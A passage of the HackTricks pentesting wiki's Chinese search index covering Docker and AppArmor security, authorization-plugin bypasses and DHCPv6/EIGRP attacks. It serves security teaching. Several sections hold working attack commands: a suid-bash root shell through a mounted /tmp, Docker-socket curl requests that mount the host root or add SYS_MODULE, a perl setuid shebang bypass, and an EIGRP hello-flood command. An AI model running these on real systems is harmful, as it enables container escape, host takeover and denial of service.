要检查哪些目录支持suid位,请运行 mount | grep -v \\"nosuid\\"。例如,通常 /dev/shm、/run、/proc、/sys/fs/cgroup 和 /var/lib/lxcfs 不支持suid位。 还要注意,如果你可以 挂载 /etc 或任何其他 包含配置文件 的文件夹,你可以在docker容器中以root身份更改它们,以便在主机上 利用它们 并提升权限(可能修改 /etc/shadow)。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Abusing Docker Socket for Privilege Escalation » 通过挂载","id":"1569","title":"通过挂载"},"157":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 下表展示了 DHCPv6 和 DHCPv4 消息类型的比较视图: DHCPv6 消息类型 DHCPv4 消息类型 Solicit (1) DHCPDISCOVER Advertise (2) DHCPOFFER Request (3), Renew (5), Rebind (6) DHCPREQUEST Reply (7) DHCPACK / DHCPNAK Release (8) DHCPRELEASE Information-Request (11) DHCPINFORM Decline (9) DHCPDECLINE Confirm (4) none Reconfigure (10) DHCPFORCERENEW Relay-Forw (12), Relay-Reply (13) none DHCPv6 消息类型的详细说明: Solicit (1) :由 DHCPv6 客户端发起,以查找可用的服务器。 Advertise (2) :服务器在响应 Solicit 时发送,表示 DHCP 服务的可用性。 Request (3) :客户端用此请求特定服务器的 IP 地址或前缀。 Confirm (4) :客户端用于验证分配的地址在网络上是否仍然有效,通常在网络变化后。 Renew (5) :客户端向原服务器发送此消息以延长地址生命周期或更新配置。 Rebind (6) :发送给任何服务器以延长地址生命周期或更新配置,特别是在未收到 Renew 响应时。 Reply (7) :服务器用此提供地址、配置参数或确认如 Release 或 Decline 的消息。 Release (8) :客户端通知服务器停止使用一个或多个分配的地址。 Decline (9) :客户端发送此消息以报告分配的地址在网络上发生冲突。 Reconfigure (10) :服务器提示客户端发起新或更新配置的事务。 Information-Request (11) :客户端请求配置参数而不分配 IP 地址。 Relay-Forw (12) :中继代理将消息转发给服务器。 Relay-Repl (13) :服务器回复中继代理,后者将消息传递给客户端。","breadcrumbs":"Pentesting Network » DHCPv6 » DHCPv6 与 DHCPv4 消息类型比较","id":"157","title":"DHCPv6 与 DHCPv4 消息类型比较"},"1570":{"body":"--privileged -> 使用此标志,你可以 移除容器的所有隔离 。检查技术以 以root身份从特权容器中逃逸 。 --cap-add= [--security-opt apparmor=unconfined] [--security-opt seccomp=unconfined] [-security-opt label:disable] -> 为了 通过能力提升 , 将该能力授予容器 
并禁用可能阻止漏洞工作的其他保护方法。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Abusing Docker Socket for Privilege Escalation » 从容器中逃逸","id":"1570","title":"从容器中逃逸"},"1571":{"body":"在本页中,我们讨论了使用docker标志提升权限的方法,你可以在页面中找到 使用curl命令滥用这些方法的方式 : tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Abusing Docker Socket for Privilege Escalation » Curl","id":"1571","title":"Curl"},"1572":{"body":"Reading time: 14 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » AppArmor","id":"1572","title":"AppArmor"},"1573":{"body":"AppArmor 是一个 内核增强,旨在通过每个程序的配置文件限制程序可用的资源 ,有效地通过将访问控制属性直接与程序而非用户绑定来实现强制访问控制 (MAC)。该系统通过 将配置文件加载到内核中 来运行,通常在启动时,这些配置文件规定了程序可以访问的资源,例如网络连接、原始套接字访问和文件权限。 AppArmor 配置文件有两种操作模式: 强制模式 :此模式积极执行配置文件中定义的策略,阻止违反这些政策的操作,并通过 syslog 或 auditd 等系统记录任何试图违反的行为。 投诉模式 :与强制模式不同,投诉模式不会阻止违反配置文件政策的操作。相反,它将这些尝试记录为政策违规,而不执行限制。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » 基本信息","id":"1573","title":"基本信息"},"1574":{"body":"内核模块 :负责政策的执行。 政策 :指定程序行为和资源访问的规则和限制。 解析器 :将政策加载到内核中以进行执行或报告。 实用程序 :这些是用户模式程序,提供与 AppArmor 交互和管理的接口。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » AppArmor 的组件","id":"1574","title":"AppArmor 的组件"},"1575":{"body":"Apparmor 配置文件通常保存在 /etc/apparmor.d/ 使用 sudo aa-status,您将能够列出受某些配置文件限制的二进制文件。如果您将每个列出二进制文件路径中的字符 \\"/\\" 更改为点,您将获得提到的文件夹内的 apparmor 配置文件名称。 例如, apparmor 配置文件对于 /usr/bin/man 将位于 /etc/apparmor.d/usr.bin.man","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » 配置文件路径","id":"1575","title":"配置文件路径"},"1576":{"body":"bash aa-status #check the current status\\naa-enforce #set profile to enforce mode (from disable or complain)\\naa-complain #set profile to complain mode (from diable or enforcement)\\napparmor_parser #to load/reload an altered policy\\naa-genprof #generate a new profile\\naa-logprof #used to change the policy when the binary/program is changed\\naa-mergeprof #used to merge the policies","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » 命令","id":"1576","title":"命令"},"1577":{"body":"为了指示受影响的可执行文件, 绝对路径和通配符 被允许用于指定文件。 要指示二进制文件对 文件 的访问,可以使用以下 访问控制 : r (读取) w (写入) m (将内存映射为可执行) k (文件锁定) l (创建硬链接) ix (执行另一个程序,新程序继承策略) Px (在另一个配置文件下执行,清理环境后) Cx (在子配置文件下执行,清理环境后) Ux (在无约束下执行,清理环境后) 变量 可以在配置文件中定义,并可以从配置文件外部进行操作。例如:@{PROC} 和 @{HOME}(将 #include 添加到配置文件中) 支持拒绝规则以覆盖允许规则 
。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » 创建配置文件","id":"1577","title":"创建配置文件"},"1578":{"body":"为了轻松开始创建配置文件,apparmor 可以帮助你。可以让 apparmor 检查二进制文件执行的操作,然后让你决定要允许或拒绝哪些操作 。 你只需运行: bash sudo aa-genprof /path/to/binary 然后,在另一个控制台中执行二进制文件通常会执行的所有操作: bash /path/to/binary -a dosomething 然后,在第一个控制台中按“ s ”,然后在记录的操作中指示您想要忽略、允许或其他。当您完成后按“ f ”,新配置文件将创建在 /etc/apparmor.d/path.to.binary note 使用箭头键可以选择您想要允许/拒绝/其他的内容","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » aa-genprof","id":"1578","title":"aa-genprof"},"1579":{"body":"您还可以使用以下命令创建二进制文件的 apparmor 配置文件模板: bash sudo aa-easyprof /path/to/binary\\n# vim:syntax=apparmor\\n# AppArmor policy for binary\\n# ###AUTHOR###\\n# ###COPYRIGHT###\\n# ###COMMENT### #include # No template variables specified \\"/path/to/binary\\" {\\n#include # No abstractions specified # No policy groups specified # No read paths specified # No write paths specified\\n} note 请注意,默认情况下,在创建的配置文件中没有任何内容被允许,因此所有内容都被拒绝。您需要添加类似 /etc/passwd r, 的行,以允许二进制文件读取 /etc/passwd,例如。 您可以然后 enforce 新的配置文件,使用 bash sudo apparmor_parser -a /etc/apparmor.d/path.to.binary","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » aa-easyprof","id":"1579","title":"aa-easyprof"},"158":{"body":"https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » DHCPv6 » 参考文献","id":"158","title":"参考文献"},"1580":{"body":"以下工具将读取日志并询问用户是否希望允许某些检测到的禁止操作: bash sudo aa-logprof note 使用箭头键可以选择您想要允许/拒绝/其他的内容","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » 从日志修改配置文件","id":"1580","title":"从日志修改配置文件"},"1581":{"body":"bash #Main profile management commands\\napparmor_parser -a /etc/apparmor.d/profile.name #Load a new profile in enforce mode\\napparmor_parser -C /etc/apparmor.d/profile.name #Load a new profile in complain mode\\napparmor_parser -r /etc/apparmor.d/profile.name #Replace existing profile\\napparmor_parser -R /etc/apparmor.d/profile.name #Remove profile","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » 管理配置文件","id":"1581","title":"管理配置文件"},"1582":{"body":"来自 /var/log/audit/audit.log 的可执行文件 service_bin 的 AUDIT 和 DENIED 日志示例: bash type=AVC msg=audit(1610061880.392:286): apparmor=\\"AUDIT\\" operation=\\"getattr\\" profile=\\"/bin/rcat\\" name=\\"/dev/pts/1\\" pid=954 comm=\\"service_bin\\" requested_mask=\\"r\\" fsuid=1000 ouid=1000\\ntype=AVC msg=audit(1610061880.392:287): apparmor=\\"DENIED\\" operation=\\"open\\" profile=\\"/bin/rcat\\" name=\\"/etc/hosts\\" pid=954 comm=\\"service_bin\\" requested_mask=\\"r\\" denied_mask=\\"r\\" fsuid=1000 ouid=0 您还可以使用以下方法获取此信息: bash sudo aa-notify -s 1 -v\\nProfile: /bin/service_bin\\nOperation: open\\nName: /etc/passwd\\nDenied: r\\nLogfile: /var/log/audit/audit.log Profile: /bin/service_bin\\nOperation: open\\nName: /etc/hosts\\nDenied: r\\nLogfile: /var/log/audit/audit.log AppArmor denials: 2 (since Wed Jan 6 23:51:08 2021)\\nFor more information, please see: https://wiki.ubuntu.com/DebuggingApparmor","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » 日志","id":"1582","title":"日志"},"1583":{"body":"注意 docker-profile 的配置文件是默认加载的: bash sudo aa-status\\napparmor module is loaded.\\n50 profiles are loaded.\\n13 profiles are 
in enforce mode.\\n/sbin/dhclient\\n/usr/bin/lxc-start\\n/usr/lib/NetworkManager/nm-dhcp-client.action\\n/usr/lib/NetworkManager/nm-dhcp-helper\\n/usr/lib/chromium-browser/chromium-browser//browser_java\\n/usr/lib/chromium-browser/chromium-browser//browser_openjdk\\n/usr/lib/chromium-browser/chromium-browser//sanitized_helper\\n/usr/lib/connman/scripts/dhclient-script\\ndocker-default 默认情况下, Apparmor docker-default 配置文件 是从 https://github.com/moby/moby/tree/master/profiles/apparmor 生成的。 docker-default 配置文件摘要 : 访问 所有 网络 未定义能力 (但是,一些能力将来自包含基本基础规则,即 #include ) 写入 任何**/proc** 文件 不允许 其他/ proc 和/ sys 的 子目录 / 文件 被 拒绝 读/写/锁/链接/执行访问 挂载****不允许 Ptrace 只能在被 相同 apparmor 配置文件 限制的进程上运行 一旦你 运行一个 docker 容器 ,你应该看到以下输出: bash 1 processes are in enforce mode.\\ndocker-default (825) 注意, apparmor 甚至会阻止默认情况下授予容器的能力特权 。例如,它将能够 阻止写入 /proc 的权限,即使授予了 SYS_ADMIN 能力 ,因为默认情况下 docker apparmor 配置文件拒绝此访问: bash docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined ubuntu /bin/bash\\necho \\"\\" > /proc/stat\\nsh: 1: cannot create /proc/stat: Permission denied 您需要 禁用 apparmor 以绕过其限制: bash docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu /bin/bash 请注意,默认情况下, AppArmor 还会 禁止容器从内部挂载 文件夹,即使具有 SYS_ADMIN 能力。 请注意,您可以 添加/删除 能力 到 docker 容器(这仍然会受到 AppArmor 和 Seccomp 等保护方法的限制): --cap-add=SYS_ADMIN 给予 SYS_ADMIN 能力 --cap-add=ALL 给予所有能力 --cap-drop=ALL --cap-add=SYS_PTRACE 删除所有能力,仅给予 SYS_PTRACE note 通常,当您 发现 在 docker 容器 内部 有一个 特权能力 可用 但 某些部分的 利用没有工作 时,这将是因为 docker apparmor 会阻止它 。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » Apparmor in Docker","id":"1583","title":"Apparmor in Docker"},"1584":{"body":"(示例来自 这里 ) 为了说明 AppArmor 的功能,我创建了一个新的 Docker 配置文件 “mydocker”,并添加了以下行: deny /etc/* w, # deny write for all files directly in /etc (not in a subdir) 要激活配置文件,我们需要执行以下操作: sudo apparmor_parser -r -W mydocker 要列出配置文件,我们可以执行以下命令。下面的命令列出了我的新 AppArmor 配置文件。 $ sudo apparmor_status | grep mydocker\\nmydocker 
如下面所示,当尝试更改“/etc/”时,我们会遇到错误,因为 AppArmor 配置文件阻止对“/etc”的写入访问。 $ docker run --rm -it --security-opt apparmor:mydocker -v ~/haproxy:/localhost busybox chmod 400 /etc/hostname\\nchmod: /etc/hostname: Permission denied","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » 示例","id":"1584","title":"示例"},"1585":{"body":"您可以使用以下命令找到 正在运行容器的 apparmor 配置文件 : bash docker inspect 9d622d73a614 | grep lowpriv\\n\\"AppArmorProfile\\": \\"lowpriv\\",\\n\\"apparmor=lowpriv\\" 然后,您可以运行以下命令来 查找正在使用的确切配置文件 : bash find /etc/apparmor.d/ -name \\"*lowpriv*\\" -maxdepth 1 2>/dev/null 在奇怪的情况下,你可以 修改 apparmor docker 配置文件并重新加载它。 你可以删除限制并“绕过”它们。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » AppArmor Docker Bypass1","id":"1585","title":"AppArmor Docker Bypass1"},"1586":{"body":"AppArmor 是基于路径的, 这意味着即使它可能在保护像 /proc 这样的目录中的文件,如果你可以 配置容器的运行方式, 你可以 挂载 主机的 proc 目录到 /host/proc ,并且它 将不再受到 AppArmor 的保护 。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » AppArmor Docker Bypass2","id":"1586","title":"AppArmor Docker Bypass2"},"1587":{"body":"在 这个漏洞 中,你可以看到一个例子,说明 即使你正在防止 perl 使用某些资源运行, 如果你只需创建一个 shell 脚本 在第一行指定 #!/usr/bin/perl 并且你 直接执行该文件, 你将能够执行你想要的任何内容。例如: perl echo \'#!/usr/bin/perl\\nuse POSIX qw(strftime);\\nuse POSIX qw(setuid);\\nPOSIX::setuid(0);\\nexec \\"/bin/sh\\"\' > /tmp/test.pl\\nchmod +x /tmp/test.pl\\n/tmp/test.pl tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » AppArmor Shebang Bypass","id":"1587","title":"AppArmor Shebang Bypass"},"1588":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 Docker 的开箱即用 授权 模型是 全有或全无 。任何有权限访问 Docker 守护进程的用户都可以 运行任何 Docker 客户端 命令 。使用 Docker 的引擎 API 联系守护进程的调用者也是如此。如果您需要 更严格的访问控制 ,可以创建 授权插件 并将其添加到 Docker 守护进程配置中。使用授权插件,Docker 管理员可以 配置细粒度访问 策略来管理对 Docker 守护进程的访问。 Docker Auth 插件是 外部 插件 ,您可以用它们来 允许/拒绝 请求到 Docker 守护进程的 操作 ,这取决于请求的 用户 和 请求的操作 。 以下信息来自文档 当通过 CLI 或引擎 API 向 Docker 守护进程 发出 HTTP 请求 时, 身份验证 子系统 会将请求传递给已安装的 身份验证 插件 。请求包含用户(调用者)和命令上下文。 插件 负责决定是否 允许 或 拒绝 请求。 下面的序列图描绘了允许和拒绝的授权流程: Authorization Allow flow Authorization Deny flow 每个发送到插件的请求 包括经过身份验证的用户、HTTP 头和请求/响应体 。只有 用户名 和 使用的身份验证方法 被传递给插件。最重要的是, 不 会传递用户 凭据 或令牌。最后, 并非所有请求/响应体都会发送 到授权插件。只有那些 Content-Type 为 text/* 或 application/json 的请求/响应体会被发送。 对于可能劫持 HTTP 连接的命令(HTTP Upgrade),如 exec,授权插件仅在初始 HTTP 请求时被调用。一旦插件批准命令,后续流程不再应用授权。具体来说,流数据不会传递给授权插件。对于返回分块 HTTP 响应的命令,如 logs 和 events,仅 HTTP 请求会发送到授权插件。 在请求/响应处理过程中,一些授权流程可能需要对 Docker 守护进程进行额外查询。为了完成这些流程,插件可以像普通用户一样调用守护进程 API。为了启用这些额外查询,插件必须提供管理员配置适当身份验证和安全策略的手段。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 基本架构","id":"1588","title":"基本架构"},"1589":{"body":"您负责将 插件 注册为 Docker 守护进程 启动 的一部分。您可以安装 多个插件并将它们链接在一起 。这个链可以是有序的。每个对守护进程的请求按顺序通过链。只有当 所有插件都授予访问 资源时,访问才会被授予。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 多个插件","id":"1589","title":"多个插件"},"159":{"body":"Reading time: 4 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert 
(ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 这是在 https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 中曝光的攻击摘要。请查看以获取更多信息。","breadcrumbs":"Pentesting Network » EIGRP Attacks » EIGRP攻击","id":"159","title":"EIGRP攻击"},"1590":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 插件示例","id":"1590","title":"插件示例"},"1591":{"body":"插件 authz 允许您创建一个简单的 JSON 文件,插件将 读取 该文件以授权请求。因此,它使您能够非常轻松地控制哪些 API 端点可以访问每个用户。 这是一个示例,允许 Alice 和 Bob 创建新容器:{\\"name\\":\\"policy_3\\",\\"users\\":[\\"alice\\",\\"bob\\"],\\"actions\\":[\\"container_create\\"]} 在页面 route_parser.go 中,您可以找到请求的 URL 与操作之间的关系。在页面 types.go 中,您可以找到操作名称与操作之间的关系。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » Twistlock AuthZ Broker","id":"1591","title":"Twistlock AuthZ Broker"},"1592":{"body":"您可以在这里找到一个 易于理解的插件 ,其中包含有关安装和调试的详细信息: https://github.com/carlospolop-forks/authobot 阅读 README 和 plugin.go 代码以了解其工作原理。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 简单插件教程","id":"1592","title":"简单插件教程"},"1593":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » Docker Auth 插件绕过","id":"1593","title":"Docker Auth 插件绕过"},"1594":{"body":"主要检查的内容是 哪些端点被允许 和 哪些 HostConfig 的值被允许 。 要执行此枚举,您可以 使用工具 https://github.com/carlospolop/docker_auth_profiler .","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 枚举访问","id":"1594","title":"枚举访问"},"1595":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN 
- Docker Access Authorization Plugin » 不允许的 run --privileged","id":"1595","title":"不允许的 run --privileged"},"1596":{"body":"bash docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 最小权限","id":"1596","title":"最小权限"},"1597":{"body":"在这种情况下,系统管理员 不允许用户挂载卷并使用 --privileged 标志运行容器 或给予容器任何额外的能力: bash docker run -d --privileged modified-ubuntu\\ndocker: Error response from daemon: authorization denied by plugin customauth: [DOCKER FIREWALL] Specified Privileged option value is Disallowed.\\nSee \'docker run --help\'. 然而,用户可以 在运行中的容器内创建一个 shell 并赋予其额外的权限 : bash docker run -d --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu\\n#bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4f1de # Now you can run a shell with --privileged\\ndocker exec -it privileged bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4f1de bash\\n# With --cap-add=ALL\\ndocker exec -it ---cap-add=ALL bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4 bash\\n# With --cap-add=SYS_ADMIN\\ndocker exec -it ---cap-add=SYS_ADMIN bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4 bash 现在,用户可以使用任何 之前讨论过的技术 从容器中逃逸并在主机内部 提升权限 。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 运行容器并获得特权会话","id":"1597","title":"运行容器并获得特权会话"},"1598":{"body":"在这种情况下,系统管理员 不允许用户使用--privileged标志运行容器 或给予容器任何额外的能力,他只允许挂载/tmp文件夹: bash host> cp /bin/bash /tmp #Cerate a copy of bash\\nhost> docker run -it -v /tmp:/host ubuntu:18.04 bash #Mount the /tmp folder of the host and get a shell\\ndocker container> chown root:root /host/bash\\ndocker container> chmod u+s /host/bash\\nhost> /tmp/bash\\n-p #This will give you a shell as root note 请注意,您可能无法挂载文件夹 /tmp,但您可以挂载一个 不同的可写文件夹 。您可以使用以下命令查找可写目录: find / -writable -type d 2>/dev/null 请注意,并非所有 Linux 机器上的目录都支持 suid 位! 
要检查哪些目录支持 suid 位,请运行 mount | grep -v \\"nosuid\\"。例如,通常 /dev/shm、/run、/proc、/sys/fs/cgroup 和 /var/lib/lxcfs 不支持 suid 位。 还要注意,如果您可以 挂载 /etc 或任何其他 包含配置文件 的文件夹,您可以作为 root 从 docker 容器中更改它们,以便在主机上 滥用它们 并提升权限(可能修改 /etc/shadow)。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 挂载可写文件夹","id":"1598","title":"挂载可写文件夹"},"1599":{"body":"配置此插件的系统管理员的责任是控制每个用户可以执行的操作及其权限。因此,如果管理员对端点和属性采取 黑名单 方法,他可能会 忘记一些 可能允许攻击者 提升权限 的端点。 您可以在 https://docs.docker.com/engine/api/v1.40/# 检查 docker API。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 未检查的 API 端点","id":"1599","title":"未检查的 API 端点"},"16":{"body":"HackTricks Github Stats tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"HackTricks » Github 统计","id":"16","title":"Github 统计"},"160":{"body":"目标 :通过向路由器发送EIGRP hello数据包来过载路由器CPU,可能导致拒绝服务(DoS)攻击。 工具 : helloflooding.py 脚本。 执行 : %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%% 参数 : --interface:指定网络接口,例如eth0。 --as:定义EIGRP自治系统编号,例如1。 --subnet:设置子网位置,例如10.10.100.0/24。","breadcrumbs":"Pentesting Network » EIGRP Attacks » 伪造EIGRP邻居攻击","id":"160","title":"伪造EIGRP邻居攻击"},"1600":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 未检查的 JSON 结构","id":"1600","title":"未检查的 JSON 结构"},"1601":{"body":"可能在系统管理员配置 docker 防火墙时,他 忘记了一些重要参数 ,例如 API 中的 \\" Binds \\"。 在以下示例中,可以利用此错误配置创建并运行一个挂载主机根目录(/)的容器: bash docker version #First, find the API version of docker, 1.40 in this example\\ndocker images #List the images available\\n#Then, a container that mounts the root folder of the host\\ncurl --unix-socket /var/run/docker.sock -H \\"Content-Type: application/json\\" -d \'{\\"Image\\": \\"ubuntu\\", \\"Binds\\":[\\"/:/host\\"]}\' http:/v1.40/containers/create\\ndocker start f6932bc153ad #Start the created privileged container\\ndocker exec -it f6932bc153ad chroot /host bash #Get a shell inside of it\\n#You can access the host filesystem warning 注意在这个例子中,我们将 Binds 参数作为 JSON 的根级键使用,但在 API 中它出现在 HostConfig 键下。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » 在根目录中的绑定","id":"1601","title":"在根目录中的绑定"},"1602":{"body":"按照与 根中的 Binds 相同的指示,向 Docker API 执行此 请求 : bash curl --unix-socket /var/run/docker.sock -H \\"Content-Type: application/json\\" -d \'{\\"Image\\": \\"ubuntu\\", \\"HostConfig\\":{\\"Binds\\":[\\"/:/host\\"]}}\' http:/v1.40/containers/create","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » HostConfig 中的 
Binds","id":"1602","title":"HostConfig 中的 Binds"},"1603":{"body":"按照与 Binds in root 相同的指示,向 Docker API 执行此 request : bash curl --unix-socket /var/run/docker.sock -H \\"Content-Type: application/json\\" -d \'{\\"Image\\": \\"ubuntu-sleep\\", \\"Mounts\\": [{\\"Name\\": \\"fac36212380535\\", \\"Source\\": \\"/\\", \\"Destination\\": \\"/host\\", \\"Driver\\": \\"local\\", \\"Mode\\": \\"rw,Z\\", \\"RW\\": true, \\"Propagation\\": \\"\\", \\"Type\\": \\"bind\\", \\"Target\\": \\"/host\\"}]}\' http:/v1.40/containers/create","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » Mounts in root","id":"1603","title":"Mounts in root"},"1604":{"body":"按照与 Binds in root 相同的指示,向 Docker API 执行此 request : bash curl --unix-socket /var/run/docker.sock -H \\"Content-Type: application/json\\" -d \'{\\"Image\\": \\"ubuntu-sleep\\", \\"HostConfig\\":{\\"Mounts\\": [{\\"Name\\": \\"fac36212380535\\", \\"Source\\": \\"/\\", \\"Destination\\": \\"/host\\", \\"Driver\\": \\"local\\", \\"Mode\\": \\"rw,Z\\", \\"RW\\": true, \\"Propagation\\": \\"\\", \\"Type\\": \\"bind\\", \\"Target\\": \\"/host\\"}]}}\' http:/v1.40/containers/cre","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ& AuthN - Docker Access Authorization Plugin » Mounts in HostConfig","id":"1604","title":"Mounts in HostConfig"},"1605":{"body":"系统管理员在配置 docker 防火墙时, 可能忘记了某个参数的重要属性 ,例如 API 中的 \\" Capabilities \\" 在 \\" HostConfig \\" 内。以下示例中,可以利用此错误配置创建并运行具有 SYS_MODULE 能力的容器: bash docker version\\ncurl --unix-socket /var/run/docker.sock -H \\"Content-Type: application/json\\" -d \'{\\"Image\\": \\"ubuntu\\", \\"HostConfig\\":{\\"Capabilities\\":[\\"CAP_SYS_MODULE\\"]}}\' http:/v1.40/containers/create\\ndocker start c52a77629a9112450f3dedd1ad94ded17db61244c4249bdfbd6bb3d581f470fa\\ndocker ps\\ndocker exec -it c52a77629a91 bash\\ncapsh --print\\n#You can abuse the SYS_MODULE capability note HostConfig 通常是包含 有趣的 权限 的关键,可以用来逃离容器。然而,正如我们之前讨论的,注意在外部使用 Binds 
